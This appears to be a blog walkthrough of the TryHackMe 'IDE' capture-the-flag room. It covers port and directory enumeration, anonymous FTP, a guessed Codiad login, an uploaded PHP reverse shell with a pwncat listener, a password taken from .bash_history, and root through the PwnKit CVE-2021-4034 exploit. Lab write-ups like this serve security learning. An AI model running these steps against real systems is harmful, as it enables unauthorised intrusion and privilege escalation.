CTF : IDE

CTF IDE writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 04 March 2022

CTF : IDE

Informations

  • IP: 10.10.24.171
  • MYIP: 10.8.98.126

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p- -A 10.10.24.171
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-04 01:16 CET
Nmap scan report for 10.10.24.171
Host is up (0.038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.98.126
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_  256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   35.83 ms 10.8.0.1
2   35.96 ms 10.10.24.171

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.71 seconds

FTP is accessible as anonymous. 

console
$ ftp 10.10.24.171
Connected to 10.10.24.171.
220 (vsFTPd 3.0.3)
Name (10.10.24.171:boula): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||62754|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> cd ...
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||8327|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             151 Jun 18  2021 -
drwxr-xr-x    2 0        0            4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||9977|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |**************************************************************************|   151        8.71 KiB/s    00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (2.78 KiB/s)
ftp> ^D
221 Goodbye.

There was one file named "-" in a directory named "..." .

console
$ mv "-" ftp_file
$ file ftp_file
ftp_file: ASCII text
$ cat ftp_file
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

Now we gonna check http on port 62337 :

console
$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.24.171:62337 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.24.171:62337
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,js,sql,bkp,rar,log,xml,pub,tgz,tar,html,php,php.bak,bak,zip,sql.bak,tar.gz,json,sh,pl,rb,txt,id_rsa,py,csv,jar
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/03/04 01:19:28 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5239]
/icons/               (Status: 403) [Size: 280] 
/themes/              (Status: 200) [Size: 1136]
/common.php           (Status: 200) [Size: 0]   
/data/                (Status: 200) [Size: 1949]
/plugins/             (Status: 200) [Size: 942] 
/lib/                 (Status: 200) [Size: 1178]
/languages/           (Status: 200) [Size: 4614]
/js/                  (Status: 200) [Size: 3702]
/components/          (Status: 200) [Size: 3943]
/config.php           (Status: 200) [Size: 0]   
/INSTALL.txt          (Status: 200) [Size: 634] 
/build.xml            (Status: 200) [Size: 456] 
/LICENSE.txt          (Status: 200) [Size: 1133]
/workspace/           (Status: 200) [Size: 946]

The webapp installed is Codiad 2.8.4

Vulnerabilities search

I tried to connect with user john. There is no default password in documentation, so I tried "password" and I get in.

Exploit

So basicly I created a new projet "MyProject" with nothing in the path field. The new project was created in http[:]//10.10.24.171[:]62337/workspace/. Then, I added a new file shell.php with a reverse shell.

After that, on kali we just have to run a pwncat :

console
$ pwncat -lp 1234

Now : 

console
curl http://10.10.24.171:62337/workspace/MyProject/shell.php

And we got a shell :)

Privilege escalation

Enumeration for privesc

We are now connected as www-data user. Let's see what we can find :

console
$ cd drac
$ cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'

If we try this password to login with user drac (su or ssh) it works.

console
$ cat user.txt

Alright, let's start enumerate what this account can do : 

console
$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

What are the binaries with setuid ? :

console
$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/gpasswd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su

Exploit

I tried pwnkit and it works (the python file was sent through scp) :

console
$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# cd /root/
# cat root.txt

\o/